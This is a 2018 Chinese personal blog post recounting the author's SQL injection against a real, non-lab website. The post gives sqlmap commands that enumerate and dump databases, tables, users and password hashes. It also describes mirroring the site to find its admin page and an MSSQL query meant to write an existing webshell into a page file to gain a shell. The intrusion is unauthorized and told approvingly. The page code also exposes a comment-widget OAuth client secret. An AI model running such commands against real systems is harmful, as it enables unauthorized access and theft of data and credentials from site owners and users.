<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="杜焰" type="application/atom+xml" />






<meta name="description" content="前言&amp;#160; &amp;#160; &amp;#160;&amp;#160;一直有关注安全行业，因为热爱，虽没有投身于安全的工作中，但是也在一点一点的积累，可以说这个行业的门槛太高，要学习的东西太多，没有一套学习体系，也可以说这个行业的门槛太低，一大堆工具可以拿来用。诚以为进入这个行业，必不能心高气傲，一定要善于发现，乐于探索，忍受孤独。 &amp;#160; &amp;#160; &amp;#160;&amp;#160;漏洞只是开发人员留下的BU">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入心得">
<meta property="og:url" content="http://duyana.top/post/e05553d0/index.html">
<meta property="og:site_name" content="杜焰">
<meta property="og:description" content="前言&amp;#160; &amp;#160; &amp;#160;&amp;#160;一直有关注安全行业，因为热爱，虽没有投身于安全的工作中，但是也在一点一点的积累，可以说这个行业的门槛太高，要学习的东西太多，没有一套学习体系，也可以说这个行业的门槛太低，一大堆工具可以拿来用。诚以为进入这个行业，必不能心高气傲，一定要善于发现，乐于探索，忍受孤独。 &amp;#160; &amp;#160; &amp;#160;&amp;#160;漏洞只是开发人员留下的BU">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/1202F11D4AB042FC93B1A97DF274AEAB?method=download&shareKey=7cefc8e1c753fc1d0282f4b31f66fb67">
<meta property="og:image" content="https://note.youdao.com/yws/api/personal/file/353080C1C8654A138F93185167BF7381?method=download&shareKey=5ed0fd27c99d9a77deca3257a1f34c59">
<meta property="og:updated_time" content="2018-08-20T14:34:31.569Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入心得">
<meta name="twitter:description" content="前言&amp;#160; &amp;#160; &amp;#160;&amp;#160;一直有关注安全行业，因为热爱，虽没有投身于安全的工作中，但是也在一点一点的积累，可以说这个行业的门槛太高，要学习的东西太多，没有一套学习体系，也可以说这个行业的门槛太低，一大堆工具可以拿来用。诚以为进入这个行业，必不能心高气傲，一定要善于发现，乐于探索，忍受孤独。 &amp;#160; &amp;#160; &amp;#160;&amp;#160;漏洞只是开发人员留下的BU">
<meta name="twitter:image" content="https://note.youdao.com/yws/api/personal/file/1202F11D4AB042FC93B1A97DF274AEAB?method=download&shareKey=7cefc8e1c753fc1d0282f4b31f66fb67">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://duyana.top/post/e05553d0/"/>





  <title>SQL注入心得 | 杜焰</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">杜焰</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">duyan</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://duyana.top/post/e05553d0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="杜焰">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="杜焰">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">SQL注入心得</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-08-19T23:21:54+08:00">
                2018-08-19
              </time>
            

            

            
			
			
              <span class="post-letters-count">
              &nbsp; | &nbsp;
              <span>530 字</span>
              &nbsp; | &nbsp;
              <span>2 min</span>
              </span>
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>&#160; &#160; &#160;&#160;一直有关注安全行业，因为热爱，虽没有投身于安全的工作中，但是也在一点一点的积累，可以说这个行业的门槛太高，要学习的东西太多，没有一套学习体系，也可以说这个行业的门槛太低，一大堆工具可以拿来用。诚以为进入这个行业，必不能心高气傲，一定要善于发现，乐于探索，忍受孤独。</p>
<p>&#160; &#160; &#160;&#160;漏洞只是开发人员留下的BUG，我在从尽量不留BUG做起。</p>
<h2 id="过程"><a href="#过程" class="headerlink" title="过程"></a>过程</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;www.*****.net.cn/About.aspx?code=0102&quot;</span><br><span class="line">sqlmap -u &quot;www.*****.net.cn/About.aspx?code=0102&quot; --dbs</span><br><span class="line">sqlmap -u &quot;www.*****.net.cn/About.aspx?code=0102&quot; -D yishang --tables</span><br><span class="line">sqlmap -u &quot;www.*****.net.cn/About.aspx?code=0102&quot; -D yishang -T cmd --columns</span><br><span class="line">sqlmap -u &quot;www.*****.net.cn/About.aspx?code=0102&quot; -D yishang -T cmd -C a --dump</span><br></pre></td></tr></table></figure>
<p>&#160; &#160; &#160;&#160;今天终于在非靶机环境发现了一个注入点，用Sqlmap猜解数据库，还发现了别人留下一句话木马。<br><img src="https://note.youdao.com/yws/api/personal/file/1202F11D4AB042FC93B1A97DF274AEAB?method=download&amp;shareKey=7cefc8e1c753fc1d0282f4b31f66fb67" alt="image"></p>
<p>&#160; &#160; &#160;&#160;原来这个网站早就成为别人的菠菜跳转网站了，心想着为民除害，工具扫后台没有扫出来，直接wget下载了整个网站，哈哈哈，找到了后台登录页面。</p>
<p><img src="https://note.youdao.com/yws/api/personal/file/353080C1C8654A138F93185167BF7381?method=download&amp;shareKey=5ed0fd27c99d9a77deca3257a1f34c59" alt="image"></p>
<p>&#160; &#160; &#160;&#160;有人问我有一句话木马了为什么还不上菜刀，因为我一直没能把数据库里面的一句话导出到网页文件中，网上搜索看到这个方法。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * into [a] in &apos;d:/wwwroot/huashi1/About.aspx;x.xls&apos; &apos;excel 4.0;&apos; from cmd</span><br></pre></td></tr></table></figure>
<p>&#160; &#160; &#160;&#160;但是在这个注入点(‘and’1’=’1)利用不了,也许是我学艺不精，还不知道怎么利用(有看到这里的朋友可以留言指导一下)。</p>
<h2 id="2018-08-20-20-21-54-更新"><a href="#2018-08-20-20-21-54-更新" class="headerlink" title="2018-08-20 20:21:54 更新"></a>2018-08-20 20:21:54 更新</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./sqlmap.py –u “https://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户</span><br><span class="line">./sqlmap.py –u “https://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash</span><br></pre></td></tr></table></figure>
<p>拿到mssql数据库用户与密码，但是数据库是hash加密的，还加了salt，还是不能破解密码。(三天了还是没有拿到shell,难受)</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p>[1] <a href="http://www.vuln.cn/1992" target="_blank" rel="noopener">博主–漏洞人生</a></p>
<p>[2] <a href="https://www.2cto.com/database/201404/294363.html" target="_blank" rel="noopener">红黑联盟</a></p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>念念不忘，必有回响。</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="杜焰 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="杜焰 支付宝"/>
        <p>支付宝</p>
      </div>
    

    
      <div id="bitcoin" style="display: inline-block">
        <img id="bitcoin_qr" src="/images/bitcoin.jpg" alt="杜焰 比特币"/>
        <p>比特币</p>
      </div>
    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/post/6a73a48a/" rel="next" title="二进制负数减法运算为什么要按位取反再加一">
                <i class="fa fa-chevron-left"></i> 二进制负数减法运算为什么要按位取反再加一
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>
  
  <!-- Link Gitalk 的支持文件  -->
    <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
    <script src="https://unpkg.com/gitalk@latest/dist/gitalk.min.js"></script> 
    <div id="gitalk-container"></div>     <script type="text/javascript">
    var gitalk = new Gitalk({

    // gitalk的主要参数
        clientID: 'b3140ef051ce9745b8e2',
        clientSecret: '57378b80da68673364b2e5d0bc53e39c1a4610db',
        repo: 'gitalk-comments',
        owner: 'duyannnnn',
        admin: ['duyannnnn'],
        id: window.location.pathname,

    });
    gitalk.render('gitalk-container');
  </script> 
  <!-- Gitalk end -->


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">杜焰</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#过程"><span class="nav-number">2.</span> <span class="nav-text">过程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2018-08-20-20-21-54-更新"><span class="nav-number">3.</span> <span class="nav-text">2018-08-20 20:21:54 更新</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考资料"><span class="nav-number">4.</span> <span class="nav-text">参考资料</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">杜焰</span>

  
</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  













  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
